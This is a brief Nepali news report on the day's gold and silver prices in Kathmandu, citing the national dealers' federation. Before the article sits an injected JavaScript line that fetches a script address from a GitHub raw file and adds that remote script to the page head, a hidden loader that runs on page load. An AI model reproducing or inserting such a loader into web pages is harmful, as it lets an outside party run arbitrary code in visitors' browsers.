;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर २१,
काठमाडौं । सुनको मूल्य आज घटेको छ । सुन आज हप्ताको पहिलो दिन आइतबार २ सय रुपैयाँले भाउ घटेको हो ।
आइतबार सुन ९२ हजार ७ सय रुपैयाँ कायम भएको नेपाल सुनचाँदी ब्यवसायी महासंघले जनाएको छ । अन्तराष्ट्रिय बजारमा नै भाउमा उतार-चढाउ आएकाले नेपाली बजारमा पनि भाउ तलामाथी भैरहेको महासंघले जनाएको छ ।
आज चाँदीको भाउ भने स्थिर रहेको छ । आज पनि चाँदी तोलामा १२ सय १० रुपैयाँमा कारोबार भइरहेको छ ।
फेसबुक प्रतिक्रियाहरु